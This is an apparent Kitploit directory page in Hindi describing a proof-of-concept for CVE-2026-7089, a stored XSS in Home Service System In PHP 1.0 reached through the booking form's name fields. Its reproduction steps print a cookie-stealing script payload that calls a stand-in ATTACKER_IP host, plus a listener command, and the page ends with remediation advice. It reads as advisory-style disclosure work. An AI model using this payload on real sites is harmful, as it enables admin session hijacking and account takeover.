Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-7089-XSS — # CVE-2026-7089 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, होम सर्विस सिस्टम PHP 1.0 में संग्रहीत XSS जो बुकिंग फॉर्म के माध्यम से बिना प्रमाणीकरण के एडमिन सत्र अपहरण की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-7089-xss
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

# CVE-2026-7089 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, होम सर्विस सिस्टम PHP 1.0 में संग्रहीत XSS जो बुकिंग फॉर्म के माध्यम से बिना प्रमाणीकरण के एडमिन सत्र अपहरण की अनुमति देता है।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

home-service-system-unauth-stored-xss-admin-takeover

भेद्यता विवरण

फ़ील्डविवरण
विक्रेताcode-projects.org
उत्पादHome Service System In PHP
संस्करण1.0
भेद्यता प्रकारसंग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)
CWECWE-79
प्रमाणीकरण आवश्यकनहीं
लेखकImad Alvi

विवरण

Home Service System In PHP 1.0 की booking.php फ़ाइल में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है। अप्रमाणित उपयोगकर्ता बुकिंग फ़ॉर्म फ़ील्ड के माध्यम से दुर्भावनापूर्ण JavaScript पेलोड इंजेक्ट कर सकते हैं। अस्वच्छित इनपुट डेटाबेस में संग्रहीत किया जाता है और प्रशासन पैनल (admin.php) में आउटपुट एन्कोडिंग के बिना प्रस्तुत किया जाता है, जहाँ यह व्यवस्थापक के ब्राउज़र संदर्भ में निष्पादित होता है।

यह एक अप्रमाणित हमलावर को व्यवस्थापक सत्र कुकी चुराने, व्यवस्थापक की ओर से कार्य करने, या व्यवस्थापक खाते से पूरी तरह समझौता करने की अनुमति देता है।


प्रभावित घटक

  • फ़ाइल: booking.php
  • पैरामीटर: fname, lname
  • सिंक: admin.php → बुकिंग प्रबंधित करें

पुनरुत्पादन के चरण

  1. अप्रमाणित उपयोगकर्ता के रूप में बुकिंग पृष्ठ पर नेविगेट करें: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. पहला नाम फ़ील्ड में, निम्नलिखित पेलोड इंजेक्ट करें:

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. शेष फ़ील्ड को किसी भी मान्य डेटा से भरें और बुकिंग सबमिट करें।

  2. अपने हमलावर मशीन पर एक लिसनर प्रारंभ करें:

root@kitploit:~
php -S 0.0.0.0:PORT
  1. व्यवस्थापक के admin.php में बुकिंग प्रबंधित करें अनुभाग पर जाने की प्रतीक्षा करें।

  2. पेलोड व्यवस्थापक के ब्राउज़र में निष्पादित होता है, सत्र कुकी को आपके लिसनर पर बाहर निकालता है।

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

प्रमाण की अवधारणा

पेलोड (अलर्ट)

root@kitploit:~
<script>alert(1)</script>
Screenshot 2026-04-08 220538

पेलोड (सत्र अपहरण)

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

प्रभाव

यह भेद्यता एक दूरस्थ अप्रमाणित हमलावर को एप्लिकेशन से पूरी तरह समझौता करने की अनुमति देती है।

एक हमलावर यह कर सकता है:

  • व्यवस्थापक के ब्राउज़र में मनमाना JavaScript निष्पादित करें
  • व्यवस्थापक की PHPSESSID सत्र कुकी चुराएं
  • व्यवस्थापक सत्र का अपहरण करें और पूर्ण प्रशासनिक पहुँच प्राप्त करें
  • कोई भी प्रशासनिक कार्य करें (बुकिंग, प्रदाता आदि प्रबंधित करें)

इसके परिणामस्वरूप एप्लिकेशन से पूर्ण समझौता होता है।

उपचार

  • संग्रहीत या प्रस्तुत करने से पहले सभी उपयोगकर्ता-आपूर्ति इनपुट पर ENT_QUOTES के साथ htmlspecialchars() लागू करें
  • सामग्री सुरक्षा नीति (CSP) हेडर लागू करें
  • सभी फ़ॉर्म इनपुट को सर्वर-साइड पर मान्य और स्वच्छ करें

संदर्भ

  • Home Service System In PHP - code-projects.org
टूल डाउनलोड करें